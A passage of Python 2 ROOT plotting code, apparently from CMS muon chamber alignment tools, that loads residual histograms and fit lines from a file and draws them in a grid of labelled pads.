chamber_x_fit.GetParameter(1), chamber_x_fit.GetParError(1),
chamber_x_fit.GetParameter(2), chamber_x_fit.GetParError(2)))
l1.Draw()
c1.GetPad(2).cd()
chamber_dxdz.Draw()
if not suppressblue: chamber_dxdz_fit2.Draw("same")
chamber_dxdz_fit.Draw("same")
l2 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
chamber_dxdz_fit.GetParameter(1), chamber_dxdz_fit.GetParError(1),
chamber_dxdz_fit.GetParameter(2), chamber_dxdz_fit.GetParError(2)))
l2.Draw()
c1.GetPad(3).cd()
chamber_alphax.Draw("col")
if not suppressblue: chamber_alphax_fit2.Draw("same")
chamber_alphax_fit.Draw("same")
for lb in l1,l2:
lb.SetNDC(1)
lb.SetTextColor(ROOT.kRed)
t6 = time.time()
ddt[5] = 1./ddt[0]*((ddt[0]-1)*ddt[5] + t6-t5)
ddt[6] = 1./ddt[0]*((ddt[0]-1)*ddt[6] + t6-t1)
def polynomials(tfile, reports, name, twobin=True, suppressblue=False):
t1 = time.time()
ddt[7] += 1
global label1, label2, label3, label4, label5, label6, label7, label8, label9
plotDirectory = "MuonAlignmentFromReference"
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(1)
tdrStyle.SetTitleFontSize(0.1)
tdrStyle.SetOptStat(0)
c1.Clear()
c1.ResetAttPad()
found = False
for r in reports:
if r.name == name:
found = True
break
if not found: raise Exception("Not a valid name")
if r.status == "FAIL":
#raise Exception, "Fit failed"
print "Fit failed"
c1.Clear()
return
Pos = "Pos"; Neg = "Neg"
if not twobin:
Pos = ""; Neg = ""
pdirPos = "MuonAlignmentFromReference/%s%s" % (name, Pos)
pdirNeg = "MuonAlignmentFromReference/%s%s" % (name, Neg)
global chamber_x_trackx, chamber_x_trackx_fit, chamber_y_trackx, chamber_y_trackx_fit, \
chamber_dxdz_trackx, chamber_dxdz_trackx_fit, chamber_dydz_trackx, chamber_dydz_trackx_fit, \
chamber_x_trackx_fit2, chamber_y_trackx_fit2, chamber_dxdz_trackx_fit2, chamber_dydz_trackx_fit2
global chamber_x_tracky, chamber_x_tracky_fit, chamber_y_tracky, chamber_y_tracky_fit, \
chamber_dxdz_tracky, chamber_dxdz_tracky_fit, chamber_dydz_tracky, chamber_dydz_tracky_fit, \
chamber_x_tracky_fit2, chamber_y_tracky_fit2, chamber_dxdz_tracky_fit2, chamber_dydz_tracky_fit2
global chamber_x_trackdxdz, chamber_x_trackdxdz_fit, chamber_y_trackdxdz, chamber_y_trackdxdz_fit, \
chamber_dxdz_trackdxdz, chamber_dxdz_trackdxdz_fit, chamber_dydz_trackdxdz, chamber_dydz_trackdxdz_fit, \
chamber_x_trackdxdz_fit2, chamber_y_trackdxdz_fit2, chamber_dxdz_trackdxdz_fit2, chamber_dydz_trackdxdz_fit2
global chamber_x_trackdydz, chamber_x_trackdydz_fit, chamber_y_trackdydz, chamber_y_trackdydz_fit, \
chamber_dxdz_trackdydz, chamber_dxdz_trackdydz_fit, chamber_dydz_trackdydz, chamber_dydz_trackdydz_fit, \
chamber_x_trackdydz_fit2, chamber_y_trackdydz_fit2, chamber_dxdz_trackdydz_fit2, chamber_dydz_trackdydz_fit2
chamber_x_trackx = tfile.Get(pdirPos+"_x_trackx")
chamber_x_trackx_fit = tfile.Get(pdirPos+"_x_trackx_fitline")
chamber_y_trackx = tfile.Get(pdirPos+"_y_trackx")
chamber_y_trackx_fit = tfile.Get(pdirPos+"_y_trackx_fitline")
chamber_dxdz_trackx = tfile.Get(pdirPos+"_dxdz_trackx")
chamber_dxdz_trackx_fit = tfile.Get(pdirPos+"_dxdz_trackx_fitline")
chamber_dydz_trackx = tfile.Get(pdirPos+"_dydz_trackx")
chamber_dydz_trackx_fit = tfile.Get(pdirPos+"_dydz_trackx_fitline")
chamber_x_trackx_fit2 = tfile.Get(pdirNeg+"_x_trackx_fitline")
chamber_y_trackx_fit2 = tfile.Get(pdirNeg+"_y_trackx_fitline")
chamber_dxdz_trackx_fit2 = tfile.Get(pdirNeg+"_dxdz_trackx_fitline")
chamber_dydz_trackx_fit2 = tfile.Get(pdirNeg+"_dydz_trackx_fitline")
chamber_x_tracky = tfile.Get(pdirPos+"_x_tracky")
chamber_x_tracky_fit = tfile.Get(pdirPos+"_x_tracky_fitline")
chamber_y_tracky = tfile.Get(pdirPos+"_y_tracky")
chamber_y_tracky_fit = tfile.Get(pdirPos+"_y_tracky_fitline")
chamber_dxdz_tracky = tfile.Get(pdirPos+"_dxdz_tracky")
chamber_dxdz_tracky_fit = tfile.Get(pdirPos+"_dxdz_tracky_fitline")
chamber_dydz_tracky = tfile.Get(pdirPos+"_dydz_tracky")
chamber_dydz_tracky_fit = tfile.Get(pdirPos+"_dydz_tracky_fitline")
chamber_x_tracky_fit2 = tfile.Get(pdirNeg+"_x_tracky_fitline")
chamber_y_tracky_fit2 = tfile.Get(pdirNeg+"_y_tracky_fitline")
chamber_dxdz_tracky_fit2 = tfile.Get(pdirNeg+"_dxdz_tracky_fitline")
chamber_dydz_tracky_fit2 = tfile.Get(pdirNeg+"_dydz_tracky_fitline")
chamber_x_trackdxdz = tfile.Get(pdirPos+"_x_trackdxdz")
chamber_x_trackdxdz_fit = tfile.Get(pdirPos+"_x_trackdxdz_fitline")
chamber_y_trackdxdz = tfile.Get(pdirPos+"_y_trackdxdz")
chamber_y_trackdxdz_fit = tfile.Get(pdirPos+"_y_trackdxdz_fitline")
chamber_dxdz_trackdxdz = tfile.Get(pdirPos+"_dxdz_trackdxdz")
chamber_dxdz_trackdxdz_fit = tfile.Get(pdirPos+"_dxdz_trackdxdz_fitline")
chamber_dydz_trackdxdz = tfile.Get(pdirPos+"_dydz_trackdxdz")
chamber_dydz_trackdxdz_fit = tfile.Get(pdirPos+"_dydz_trackdxdz_fitline")
chamber_x_trackdxdz_fit2 = tfile.Get(pdirNeg+"_x_trackdxdz_fitline")
chamber_y_trackdxdz_fit2 = tfile.Get(pdirNeg+"_y_trackdxdz_fitline")
chamber_dxdz_trackdxdz_fit2 = tfile.Get(pdirNeg+"_dxdz_trackdxdz_fitline")
chamber_dydz_trackdxdz_fit2 = tfile.Get(pdirNeg+"_dydz_trackdxdz_fitline")
chamber_x_trackdydz = tfile.Get(pdirPos+"_x_trackdydz")
chamber_x_trackdydz_fit = tfile.Get(pdirPos+"_x_trackdydz_fitline")
chamber_y_trackdydz = tfile.Get(pdirPos+"_y_trackdydz")
chamber_y_trackdydz_fit = tfile.Get(pdirPos+"_y_trackdydz_fitline")
chamber_dxdz_trackdydz = tfile.Get(pdirPos+"_dxdz_trackdydz")
chamber_dxdz_trackdydz_fit = tfile.Get(pdirPos+"_dxdz_trackdydz_fitline")
chamber_dydz_trackdydz = tfile.Get(pdirPos+"_dydz_trackdydz")
chamber_dydz_trackdydz_fit = tfile.Get(pdirPos+"_dydz_trackdydz_fitline")
chamber_x_trackdydz_fit2 = tfile.Get(pdirNeg+"_x_trackdydz_fitline")
chamber_y_trackdydz_fit2 = tfile.Get(pdirNeg+"_y_trackdydz_fitline")
chamber_dxdz_trackdydz_fit2 = tfile.Get(pdirNeg+"_dxdz_trackdydz_fitline")
chamber_dydz_trackdydz_fit2 = tfile.Get(pdirNeg+"_dydz_trackdydz_fitline")
if not chamber_x_trackx:
chamber_x_trackx = tfile.Get(pdirPos+"_residual_trackx")
chamber_x_trackx_fit = tfile.Get(pdirPos+"_residual_trackx_fitline")
chamber_dxdz_trackx = tfile.Get(pdirPos+"_resslope_trackx")
chamber_dxdz_trackx_fit = tfile.Get(pdirPos+"_resslope_trackx_fitline")
chamber_x_trackx_fit2 = tfile.Get(pdirNeg+"_residual_trackx_fitline")
chamber_dxdz_trackx_fit2 = tfile.Get(pdirNeg+"_resslope_trackx_fitline")
chamber_x_tracky = tfile.Get(pdirPos+"_residual_tracky")
chamber_x_tracky_fit = tfile.Get(pdirPos+"_residual_tracky_fitline")
chamber_dxdz_tracky = tfile.Get(pdirPos+"_resslope_tracky")
chamber_dxdz_tracky_fit = tfile.Get(pdirPos+"_resslope_tracky_fitline")
chamber_x_tracky_fit2 = tfile.Get(pdirNeg+"_residual_tracky_fitline")
chamber_dxdz_tracky_fit2 = tfile.Get(pdirNeg+"_resslope_tracky_fitline")
chamber_x_trackdxdz = tfile.Get(pdirPos+"_residual_trackdxdz")
chamber_x_trackdxdz_fit = tfile.Get(pdirPos+"_residual_trackdxdz_fitline")
chamber_dxdz_trackdxdz = tfile.Get(pdirPos+"_resslope_trackdxdz")
chamber_dxdz_trackdxdz_fit = tfile.Get(pdirPos+"_resslope_trackdxdz_fitline")
chamber_x_trackdxdz_fit2 = tfile.Get(pdirNeg+"_residual_trackdxdz_fitline")
chamber_dxdz_trackdxdz_fit2 = tfile.Get(pdirNeg+"_resslope_trackdxdz_fitline")
chamber_x_trackdydz = tfile.Get(pdirPos+"_residual_trackdydz")
chamber_x_trackdydz_fit = tfile.Get(pdirPos+"_residual_trackdydz_fitline")
chamber_dxdz_trackdydz = tfile.Get(pdirPos+"_resslope_trackdydz")
chamber_dxdz_trackdydz_fit = tfile.Get(pdirPos+"_resslope_trackdydz_fitline")
chamber_x_trackdydz_fit2 = tfile.Get(pdirNeg+"_residual_trackdydz_fitline")
chamber_dxdz_trackdydz_fit2 = tfile.Get(pdirNeg+"_resslope_trackdydz_fitline")
if not chamber_x_trackx:
print "Can't find neither "+pdirPos+"_residual nor "+pdirPos+"_residual_trackx"
return
chamber_x_trackx = chamber_x_trackx.Clone()
chamber_dxdz_trackx = chamber_dxdz_trackx.Clone()
chamber_x_tracky = chamber_x_tracky.Clone()
chamber_dxdz_tracky = chamber_dxdz_tracky.Clone()
chamber_x_trackdxdz = chamber_x_trackdxdz.Clone()
chamber_dxdz_trackdxdz = chamber_dxdz_trackdxdz.Clone()
chamber_x_trackdydz = chamber_x_trackdydz.Clone()
chamber_dxdz_trackdydz = chamber_dxdz_trackdydz.Clone()
if not not chamber_y_trackx:
chamber_y_trackx = chamber_y_trackx.Clone()
chamber_dydz_trackx = chamber_dydz_trackx.Clone()
chamber_y_tracky = chamber_y_tracky.Clone()
chamber_dydz_tracky = chamber_dydz_tracky.Clone()
chamber_y_trackdxdz = chamber_y_trackdxdz.Clone()
chamber_dydz_trackdxdz = chamber_dydz_trackdxdz.Clone()
chamber_y_trackdydz = chamber_y_trackdydz.Clone()
chamber_dydz_trackdydz = chamber_dydz_trackdydz.Clone()
if not not chamber_y_trackx:
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_x_trackx")); chamber_x_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dxdz_trackx")); chamber_dxdz_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_x_tracky")); chamber_x_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dxdz_tracky")); chamber_dxdz_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_x_trackdxdz")); chamber_x_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dxdz_trackdxdz")); chamber_dxdz_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_x_trackdydz")); chamber_x_trackdydz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dxdz_trackdydz")); chamber_dxdz_trackdydz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_y_trackx")); chamber_y_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dydz_trackx")); chamber_dydz_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_y_tracky")); chamber_y_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dydz_tracky")); chamber_dydz_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_y_trackdxdz")); chamber_y_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dydz_trackdxdz")); chamber_dydz_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_y_trackdydz")); chamber_y_trackdydz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_dydz_trackdydz")); chamber_dydz_trackdydz.Merge(tlist)
else:
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_residual_trackx")); chamber_x_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_resslope_trackx")); chamber_dxdz_trackx.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_residual_tracky")); chamber_x_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_resslope_tracky")); chamber_dxdz_tracky.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_residual_trackdxdz")); chamber_x_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_resslope_trackdxdz")); chamber_dxdz_trackdxdz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_residual_trackdydz")); chamber_x_trackdydz.Merge(tlist)
tlist = ROOT.TList(); tlist.Add(tfile.Get(pdirNeg+"_resslope_trackdydz")); chamber_dxdz_trackdydz.Merge(tlist)
rr1=10.
rr2=10.
chamber_x_trackx.SetAxisRange(-rr1, rr1, "Y")
chamber_dxdz_trackx.SetAxisRange(-rr2, rr2, "Y")
chamber_x_tracky.SetAxisRange(-rr1, rr1, "Y")
chamber_dxdz_tracky.SetAxisRange(-rr2, rr2, "Y")
chamber_x_trackdxdz.SetAxisRange(-rr1, rr1, "Y")
chamber_dxdz_trackdxdz.SetAxisRange(-rr2, rr2, "Y")
chamber_x_trackdydz.SetAxisRange(-rr1, rr1, "Y")
chamber_dxdz_trackdydz.SetAxisRange(-rr2, rr2, "Y")
rr3=10.
if not not chamber_y_trackx:
chamber_y_trackx.SetAxisRange(-rr3, rr3, "Y")
chamber_dydz_trackx.SetAxisRange(-rr3, rr3, "Y")
chamber_y_tracky.SetAxisRange(-rr3, rr3, "Y")
chamber_dydz_tracky.SetAxisRange(-rr3, rr3, "Y")
chamber_y_trackdxdz.SetAxisRange(-rr3, rr3, "Y")
chamber_dydz_trackdxdz.SetAxisRange(-rr3, rr3, "Y")
chamber_y_trackdydz.SetAxisRange(-rr3, rr3, "Y")
chamber_dydz_trackdydz.SetAxisRange(-rr3, rr3, "Y")
for h in chamber_x_trackx, chamber_y_trackx, chamber_dxdz_trackx, chamber_dydz_trackx, \
chamber_x_tracky, chamber_y_tracky, chamber_dxdz_tracky, chamber_dydz_tracky, \
chamber_x_trackdxdz, chamber_y_trackdxdz, chamber_dxdz_trackdxdz, chamber_dydz_trackdxdz, \
chamber_x_trackdydz, chamber_y_trackdydz, chamber_dxdz_trackdydz, chamber_dydz_trackdydz:
if not not h:
h.SetMarkerStyle(20)
h.SetMarkerSize(0.5)
h.GetXaxis().SetLabelSize(0.12)
h.GetYaxis().SetLabelSize(0.12)
h.GetXaxis().SetNdivisions(505)
h.GetYaxis().SetNdivisions(505)
h.GetXaxis().SetLabelOffset(0.03)
h.GetYaxis().SetLabelOffset(0.03)
trackdxdz_minimum, trackdxdz_maximum = None, None
for h in chamber_x_trackdxdz, chamber_y_trackdxdz, chamber_dxdz_trackdxdz, chamber_dydz_trackdxdz:
if not not h:
for i in xrange(1, h.GetNbinsX()+1):
if h.GetBinError(i) > 0.01 and h.GetBinContent(i) - h.GetBinError(i) < 10. and \
h.GetBinContent(i) + h.GetBinError(i) > -10.:
if not trackdxdz_minimum or trackdxdz_minimum > h.GetBinCenter(i):
trackdxdz_minimum = h.GetBinCenter(i)
if trackdxdz_maximum < h.GetBinCenter(i):
trackdxdz_maximum = h.GetBinCenter(i)
if not not trackdxdz_minimum and not not trackdxdz_maximum:
for h in chamber_x_trackdxdz, chamber_y_trackdxdz, chamber_dxdz_trackdxdz, chamber_dydz_trackdxdz:
if not not h:
h.SetAxisRange(trackdxdz_minimum, trackdxdz_maximum, "X")
trackdydz_minimum, trackdydz_maximum = None, None
for h in chamber_x_trackdydz, chamber_y_trackdydz, chamber_dxdz_trackdydz, chamber_dydz_trackdydz:
if not not h:
for i in xrange(1, h.GetNbinsX()+1):
if h.GetBinError(i) > 0.01 and h.GetBinContent(i) - h.GetBinError(i) < 10. and \
h.GetBinContent(i) + h.GetBinError(i) > -10.:
if not trackdydz_minimum or trackdydz_minimum > h.GetBinCenter(i):
trackdydz_minimum = h.GetBinCenter(i)
if trackdydz_maximum < h.GetBinCenter(i):
trackdydz_maximum = h.GetBinCenter(i)
if not not trackdydz_minimum and not not trackdydz_maximum:
for h in chamber_x_trackdydz, chamber_y_trackdydz, chamber_dxdz_trackdydz, chamber_dydz_trackdydz:
if not not h:
h.SetAxisRange(trackdydz_minimum, trackdydz_maximum, "X")
for f in chamber_x_trackx_fit2, chamber_y_trackx_fit2, chamber_dxdz_trackx_fit2, chamber_dydz_trackx_fit2, \
chamber_x_tracky_fit2, chamber_y_tracky_fit2, chamber_dxdz_tracky_fit2, chamber_dydz_tracky_fit2, \
chamber_x_trackdxdz_fit2, chamber_y_trackdxdz_fit2, chamber_dxdz_trackdxdz_fit2, chamber_dydz_trackdxdz_fit2, \
chamber_x_trackdydz_fit2, chamber_y_trackdydz_fit2, chamber_dxdz_trackdydz_fit2, chamber_dydz_trackdydz_fit2:
if not not f:
f.SetLineColor(4)
if not not chamber_y_trackx:
c1.Clear()
#c1.Divide(5, 5, 1e-5, 1e-5)
pads = [None]
pads.append(ROOT.TPad("p1" ,"",0.00,0.78,0.07,1.00,0,0,0))
pads.append(ROOT.TPad("p2" ,"",0.07,0.78,0.34,1.00,0,0,0))
pads.append(ROOT.TPad("p3" ,"",0.34,0.78,0.56,1.00,0,0,0))
pads.append(ROOT.TPad("p4" ,"",0.56,0.78,0.78,1.00,0,0,0))
pads.append(ROOT.TPad("p5" ,"",0.78,0.78,1.00,1.00,0,0,0))
pads.append(ROOT.TPad("p6" ,"",0.00,0.56,0.07,0.78,0,0,0))
pads.append(ROOT.TPad("p7" ,"",0.07,0.56,0.34,0.78,0,0,0))
pads.append(ROOT.TPad("p8" ,"",0.34,0.56,0.56,0.78,0,0,0))
pads.append(ROOT.TPad("p9" ,"",0.56,0.56,0.78,0.78,0,0,0))
pads.append(ROOT.TPad("p10","",0.78,0.56,1.00,0.78,0,0,0))
pads.append(ROOT.TPad("p11","",0.00,0.34,0.07,0.56,0,0,0))
pads.append(ROOT.TPad("p12","",0.07,0.34,0.34,0.56,0,0,0))
pads.append(ROOT.TPad("p13","",0.34,0.34,0.56,0.56,0,0,0))
pads.append(ROOT.TPad("p14","",0.56,0.34,0.78,0.56,0,0,0))
pads.append(ROOT.TPad("p15","",0.78,0.34,1.00,0.56,0,0,0))
pads.append(ROOT.TPad("p16","",0.00,0.07,0.07,0.34,0,0,0))
pads.append(ROOT.TPad("p17","",0.07,0.07,0.34,0.34,0,0,0))
pads.append(ROOT.TPad("p18","",0.34,0.07,0.56,0.34,0,0,0))
pads.append(ROOT.TPad("p19","",0.56,0.07,0.78,0.34,0,0,0))
pads.append(ROOT.TPad("p20","",0.78,0.07,1.00,0.34,0,0,0))
pads.append(ROOT.TPad("p21","",0.00,0.00,0.07,0.07,0,0,0))
pads.append(ROOT.TPad("p22","",0.07,0.00,0.34,0.07,0,0,0))
pads.append(ROOT.TPad("p23","",0.34,0.00,0.56,0.07,0,0,0))
pads.append(ROOT.TPad("p24","",0.56,0.00,0.78,0.07,0,0,0))
pads.append(ROOT.TPad("p25","",0.78,0.00,1.00,0.07,0,0,0))
for p in pads:
if not not p:
p.Draw()
ROOT.SetOwnership(p,False)
label1 = ROOT.TPaveLabel(0, 0, 1, 1, "x residuals (mm)","")
label2 = ROOT.TPaveLabel(0, 0, 1, 1, "y residuals (mm)","")
label3 = ROOT.TPaveLabel(0, 0, 1, 1, "dx/dz residuals (mrad)","")
label4 = ROOT.TPaveLabel(0, 0, 1, 1, "dy/dz residuals (mrad)","")
label5 = ROOT.TPaveLabel(0, 0, 1, 1, "x position (cm)","")
label6 = ROOT.TPaveLabel(0, 0, 1, 1, "y position (cm)","")
label7 = ROOT.TPaveLabel(0, 0, 1, 1, "dx/dz angle (rad)","")
label8 = ROOT.TPaveLabel(0, 0, 1, 1, "dy/dz angle (rad)","")
label9 = ROOT.TPaveLabel(0, 0.85, 1, 1, getname(r),"NDC")
for l in label1, label2, label3, label4, label5, label6, label7, label8, label9:
l.SetBorderSize(0)
l.SetFillColor(ROOT.kWhite)
for l in label1, label2, label3, label4:
l.SetTextAngle(90)
l.SetTextSize(0.09)
#label9.SetTextAngle(30)
label9.SetTextSize(0.59)
pads[1].cd(); label1.Draw()
pads[6].cd(); label2.Draw()
pads[11].cd(); label3.Draw()
pads[16].cd(); label4.Draw()
pads[22].cd(); label5.Draw()
pads[23].cd(); label6.Draw()
pads[24].cd(); label7.Draw()
pads[25].cd(); label8.Draw()
pads[2].SetRightMargin(1e-5)
pads[2].SetBottomMargin(1e-5)
pads[2].SetLeftMargin(0.17)
pads[3].SetLeftMargin(1e-5)
pads[3].SetRightMargin(1e-5)
pads[3].SetBottomMargin(1e-5)
pads[4].SetLeftMargin(1e-5)
pads[4].SetRightMargin(1e-5)
pads[4].SetBottomMargin(1e-5)
pads[5].SetLeftMargin(1e-5)
pads[5].SetBottomMargin(1e-5)
pads[7].SetRightMargin(1e-5)
pads[7].SetBottomMargin(1e-5)
pads[7].SetTopMargin(1e-5)
pads[7].SetLeftMargin(0.17)
pads[8].SetLeftMargin(1e-5)
pads[8].SetRightMargin(1e-5)
pads[8].SetBottomMargin(1e-5)
pads[8].SetTopMargin(1e-5)
pads[9].SetLeftMargin(1e-5)
pads[9].SetRightMargin(1e-5)
pads[9].SetBottomMargin(1e-5)
pads[9].SetTopMargin(1e-5)
pads[10].SetLeftMargin(1e-5)
pads[10].SetBottomMargin(1e-5)
pads[10].SetTopMargin(1e-5)
pads[12].SetRightMargin(1e-5)
pads[12].SetBottomMargin(1e-5)
pads[12].SetTopMargin(1e-5)
pads[12].SetLeftMargin(0.17)
pads[13].SetLeftMargin(1e-5)
pads[13].SetRightMargin(1e-5)
pads[13].SetBottomMargin(1e-5)
pads[13].SetTopMargin(1e-5)
pads[14].SetLeftMargin(1e-5)
pads[14].SetRightMargin(1e-5)
pads[14].SetBottomMargin(1e-5)
pads[14].SetTopMargin(1e-5)
pads[15].SetLeftMargin(1e-5)
pads[15].SetBottomMargin(1e-5)
pads[15].SetTopMargin(1e-5)
pads[17].SetRightMargin(1e-5)
pads[17].SetTopMargin(1e-5)
pads[17].SetLeftMargin(0.17)
pads[18].SetLeftMargin(1e-5)
pads[18].SetRightMargin(1e-5)
pads[18].SetTopMargin(1e-5)
pads[19].SetLeftMargin(1e-5)
pads[19].SetRightMargin(1e-5)
pads[19].SetTopMargin(1e-5)
pads[20].SetLeftMargin(1e-5)
pads[20].SetTopMargin(1e-5)
chamber_x_trackx.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_tracky.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdxdz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdydz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_x_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackx.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_y_tracky.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_y_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackdxdz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackdydz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_y_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackx.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_tracky.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdxdz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdydz.GetXaxis().SetLabelColor(ROOT.kWhite)
chamber_dxdz_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
# chamber_dydz_trackx
chamber_dydz_tracky.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dydz_trackdxdz.GetYaxis().SetLabelColor(ROOT.kWhite)
chamber_dydz_trackdydz.GetYaxis().SetLabelColor(ROOT.kWhite)
pads[2].cd()
chamber_x_trackx.Draw("e1")
if not suppressblue: chamber_x_trackx_fit2.Draw("samel")
chamber_x_trackx_fit.Draw("samel")
#label99 = ROOT.TPaveLabel(0, 0.8, 1, 1, getname(r),"NDC")
print getname(r)
#label99 = ROOT.TPaveLabel(0, 0.8, 1, 1, "aaa","NDC")
label9.Draw()
#pads[2].Modified()
pads[3].cd()
chamber_x_tracky.Draw("e1")
if not suppressblue: chamber_x_tracky_fit2.Draw("samel")
chamber_x_tracky_fit.Draw("samel")
pads[4].cd()
chamber_x_trackdxdz.Draw("e1")
if not suppressblue: chamber_x_trackdxdz_fit2.Draw("samel")
chamber_x_trackdxdz_fit.Draw("samel")
pads[5].cd()
chamber_x_trackdydz.Draw("e1")
if not suppressblue: chamber_x_trackdydz_fit2.Draw("samel")
chamber_x_trackdydz_fit.Draw("samel")
pads[7].cd()
chamber_y_trackx.Draw("e1")
if not suppressblue: chamber_y_trackx_fit2.Draw("samel")
chamber_y_trackx_fit.Draw("samel")
pads[8].cd()
chamber_y_tracky.Draw("e1")
if not suppressblue: chamber_y_tracky_fit2.Draw("samel")
chamber_y_tracky_fit.Draw("samel")
pads[9].cd()
chamber_y_trackdxdz.Draw("e1")
if not suppressblue: chamber_y_trackdxdz_fit2.Draw("samel")
chamber_y_trackdxdz_fit.Draw("samel")
pads[10].cd()
chamber_y_trackdydz.Draw("e1")
if not suppressblue: chamber_y_trackdydz_fit2.Draw("samel")
chamber_y_trackdydz_fit.Draw("samel")
pads[12].cd()
chamber_dxdz_trackx.Draw("e1")
if not suppressblue: chamber_dxdz_trackx_fit2.Draw("samel")
chamber_dxdz_trackx_fit.Draw("samel")
pads[13].cd()
chamber_dxdz_tracky.Draw("e1")
if not suppressblue: chamber_dxdz_tracky_fit2.Draw("samel")
chamber_dxdz_tracky_fit.Draw("samel")
pads[14].cd()
chamber_dxdz_trackdxdz.Draw("e1")
if not suppressblue: chamber_dxdz_trackdxdz_fit2.Draw("samel")
chamber_dxdz_trackdxdz_fit.Draw("samel")
pads[15].cd()
chamber_dxdz_trackdydz.Draw("e1")
if not suppressblue: chamber_dxdz_trackdydz_fit2.Draw("samel")
chamber_dxdz_trackdydz_fit.Draw("samel")
pads[17].cd()
chamber_dydz_trackx.Draw("e1")
if not suppressblue: chamber_dydz_trackx_fit2.Draw("samel")
chamber_dydz_trackx_fit.Draw("samel")
pads[18].cd()
chamber_dydz_tracky.Draw("e1")
if not suppressblue: chamber_dydz_tracky_fit2.Draw("samel")
chamber_dydz_tracky_fit.Draw("samel")
pads[19].cd()
chamber_dydz_trackdxdz.Draw("e1")
if not suppressblue: chamber_dydz_trackdxdz_fit2.Draw("samel")
chamber_dydz_trackdxdz_fit.Draw("samel")
pads[20].cd()
chamber_dydz_trackdydz.Draw("e1")
if not suppressblue: chamber_dydz_trackdydz_fit2.Draw("samel")
chamber_dydz_trackdydz_fit.Draw("samel")
else:
c1.Clear()
#c1.Divide(5, 3, 1e-5, 1e-5)
pads = [None]
pads.append(ROOT.TPad("p1" ,"",0.00,0.55,0.07,1.00,0,0,0))
pads.append(ROOT.TPad("p2" ,"",0.07,0.55,0.34,1.00,0,0,0))
pads.append(ROOT.TPad("p3" ,"",0.34,0.55,0.56,1.00,0,0,0))
pads.append(ROOT.TPad("p4" ,"",0.56,0.55,0.78,1.00,0,0,0))
pads.append(ROOT.TPad("p5" ,"",0.78,0.55,1.00,1.00,0,0,0))
pads.append(ROOT.TPad("p6" ,"",0.00,0.1,0.07,0.55,0,0,0))
pads.append(ROOT.TPad("p7" ,"",0.07,0.1,0.34,0.55,0,0,0))
pads.append(ROOT.TPad("p8" ,"",0.34,0.1,0.56,0.55,0,0,0))
pads.append(ROOT.TPad("p9" ,"",0.56,0.1,0.78,0.55,0,0,0))
pads.append(ROOT.TPad("p10","",0.78,0.1,1.00,0.55,0,0,0))
pads.append(ROOT.TPad("p11","",0.00,0.,0.07,0.1,0,0,0))
pads.append(ROOT.TPad("p12","",0.07,0.,0.34,0.1,0,0,0))
pads.append(ROOT.TPad("p13","",0.34,0.,0.56,0.1,0,0,0))
pads.append(ROOT.TPad("p14","",0.56,0.,0.78,0.1,0,0,0))
pads.append(ROOT.TPad("p15","",0.78,0.,1.00,0.1,0,0,0))
for p in pads:
if not not p:
p.Draw()
ROOT.SetOwnership(p,False)
label1 = ROOT.TPaveLabel(0, 0, 1, 1, "x residuals (mm)")
